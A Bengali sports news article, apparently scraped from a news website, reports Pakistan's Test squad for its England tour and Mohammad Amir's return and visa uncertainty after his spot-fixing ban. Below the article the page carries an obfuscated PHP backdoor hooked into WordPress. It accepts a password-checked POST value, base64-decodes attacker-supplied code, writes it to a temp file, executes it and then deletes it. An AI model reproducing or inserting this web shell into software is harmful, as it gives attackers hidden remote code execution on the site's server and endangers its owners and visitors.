বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

আমিরকে নিয়েই ইংল্যান্ড সফরে পাকিস্তান

Amirস্পোর্টস ডেস্ক : ২০১০ সালের ইংল্যান্ড সফরে স্পট ফিক্সিংয়ের দায়ে পাঁচ বছরের জন্য নিষিদ্ধ হয়েছিলেন মোহাম্মদ আমির। গত জানুয়ারিতে নিষেধাজ্ঞা কাটিয়ে জাতীয় দলে ফেরার পর থেকে তাঁর পারফরম্যান্স যথেষ্ট উজ্জ্বল। তাই অনুমিতভাবেই পাকিস্তানের ইংল্যান্ড সফরের দলে জায়গা করে নিয়েছেন এই প্রতিভাবান বাঁহাতি পেসার। যদিও ভিসা পাবেন কি না, তা এখনো অনিশ্চিত।

ছয় বছর আগে পাকিস্তানের সেই সময়ের অধিনায়ক সালমান বাট ও আরেক পেসার মোহাম্মদ আসিফের সঙ্গে স্পট ফিক্সিংয়ে জড়িয়ে আমির শুধু নিষিদ্ধই হননি। ইংল্যান্ডের মাটিতে অপরাধের দায়ে তিনজনের কারাদণ্ডও হয়েছিল। বয়স কম থাকায় আমির অবশ্য গিয়েছিলেন কিশোর সংশোধন কেন্দ্রে।

আর এই শাস্তিই দুশ্চিন্তায় ফেলে দিয়েছে পাকিস্তানকে। একজন জেলফেরত ক্রিকেটারকে যুক্তরাজ্য সরকার ভিসা দেবে কি না তা নিশ্চিত নয়। আজ টেস্ট দল ঘোষণার পর সংবাদ সম্মেলনে পাকিস্তানের প্রধান নির্বাচক ইনজামাম-উল-হকও এ ব্যাপারে পরিষ্কার করে কিছু বলতে পারেননি, ‘আশা করি কয়েক দিনের মধ্যেই আমির ভিসা পাবে। আর মোহাম্মদ হাফিজও চিকিৎসকদের কাছ থেকে সবুজসংকেত পাবে। সে জন্যই আমরা তাকে দলে রেখেছি।’ প্রায় দুই মাস ধরে হাঁটুর সমস্যায় ভুগলেও অভিজ্ঞতার কারণে হাফিজকে দলে রাখতে চাইছেন নির্বাচকরা। অবশ্য ফিটনেস পরীক্ষায় পাস করলেই ইংল্যান্ডের টিকেট পাবেন তিনি।

টি-টোয়েন্টি বিশ্বকাপে শৃঙ্খলাভঙ্গের কারণে জায়গা পাননি ওপেনার আহমেদ শেহজাদ। অভিজ্ঞতায় বেশ পিছিয়ে থাকলেও শান মাসুদ ও সামি আসলামের ওপর আস্থা রেখেছেন পাকিস্তানের নির্বাচকরা। ব্যাটিংয়ে মিসবাহ-উল-হক, ইউনুস খান, আজহার আলী ও হাফিজের অভিজ্ঞতা অবশ্য দলের কাজে আসবে। স্পিনার হিসেবে সুযোগ পেয়েছেন ইয়াসির শাহ ও জুলফিকার বাবর। আমির, ওয়াহাব রিয়াজ, রাহাত আলী, সোহেল খান ও ইমরান খানকে নিয়ে বরাবরের মতোই শক্তিশালী পাকিস্তানের পেস আক্রমণ।

ইংল্যান্ডের বিপক্ষে চারটি টেস্ট, পাঁচটি ওয়ানডে ও একটি টি-টোয়েন্টি খেলবে পাকিস্তান। ১৪ জুলাই থেকে লর্ডসে শুরু হবে প্রথম টেস্ট। সেই লর্ডস, যেখানে ছয় বছর আগে ক্রিকেট-জীবনের সবচেয়ে বড় দুর্ঘটনার শিকার হয়েছিলেন আমির!

পাকিস্তানের টেস্ট দল :

মিসবাহ-উল-হক (অধিনায়ক), মোহাম্মদ হাফিজ, শান মাসুদ, সামি আসলাম, আজহার আলী, ইউনুস খান, আসাদ শফিক, ইফতিখার আহমেদ, সরফরাজ আহমেদ, মোহাম্মদ রিজওয়ান, ইয়াসির শাহ, জুলফিকার বাবর, মোহাম্মদ আমির, ওয়াহাব রিয়াজ, রাহাত আলী, সোহেল খান ও ইমরান খান।

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}